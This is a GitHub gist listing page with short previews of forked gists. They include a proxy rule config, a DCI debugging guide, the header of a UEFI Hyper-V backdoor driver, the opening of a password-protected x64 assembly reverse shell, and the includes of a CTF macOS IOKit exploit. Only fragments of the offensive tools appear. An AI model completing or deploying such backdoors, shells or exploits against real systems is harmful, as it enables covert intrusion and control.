Skip to content

Instantly share code, notes, and snippets.

@WireFisher
WireFisher / quantumult.conf
Created May 16, 2021 03:05 — forked from Misaka-0x447f/quantumult.conf
quantumult rules
[general]
server_check_url= http://google.com/generate_204
resource_parser_url= https://raw.githubusercontent.com/KOP-XIAO/QuantumultX/master/Scripts/resource-parser.js
;运行模式模块,running_mode_trigger 设置,即根据网络自动切换 分流/直连/全局代理 等模式。
;running-mode-trigger 模式下,跟手动切换直连/全局代理 等效,rewrite/task 模块始终会生效,比 ssid 策略组设置简单,比 ssid-suspend 更灵活。
;running_mode_trigger=filter, filter, asus-5g:all_direct, asus: all_proxy
; 上述写法,前两个 filter 表示 在 4G 网络跟一般 Wi-Fi 下,走 filter(分流)模式,asus-5g 则切换为全局直连,asus 切换为全局代理
; 如需使用,相应 SSID 换成你自己 Wi-Fi 名即可
@WireFisher
WireFisher / DmaHvBackdoor.c
Created May 8, 2020 08:50 — forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
@WireFisher
WireFisher / enableDCI.txt
Created November 8, 2019 08:57 — forked from eiselekd/enableDCI.txt
Enable DCI debugging on Gigabyte-BKi5HA-7200
Enable DCI debugging on Gigabyte-BKi5HA-7200
--------------------------------------------
The Gigabyte-BKi5HA-7200 (Kabylake i5-7200 processor) can be debugged with only a USB debug cable, a
special cable that crosses only the data signals and has the power signals
removed. You can buy these cables at i.e. https://www.datapro.net/products/usb-3-0-super-speed-a-a-debugging-cable.html
The hurdle you have to overcome before you can access DCI however is that you
need to set some bits in hardware that first enable DCI and also enable the debug port so that DCI can control the cores.
There are lots of guides in howto patch the BIOS but only these two really describes all the steps using only freely accessible tools:
; =================================================
; Password protected x64 TCP Reverse Shell
; Author: Alan Vivona
; =================================================
global _start
; Syscall numbers
syscalls.socket equ 0x29
syscalls.bind equ 0x31
@WireFisher
WireFisher / bugs.chromium.user.js
Last active July 3, 2018 02:28
bugs text bigger
// ==UserScript==
// @name bugs bigger
// @namespace https://bugs.chromium.org/
// @version 0.1
// @description try to take over the world!
// @author You
// @match https://bugs.chromium.org/*
// @grant none
// ==/UserScript==
@WireFisher
WireFisher / yolo.c
Created May 16, 2018 07:28 — forked from saelo/yolo.c
Exploit for IPWnKit: a macOS IOKit exploit challenge from Defcon Qualifier CTF 2018
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <pthread.h>
#include <sys/mman.h>
#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CFPropertyList.h>
const char* kMyDriversIOKitClassName = "io_oooverflow_IPwnKit";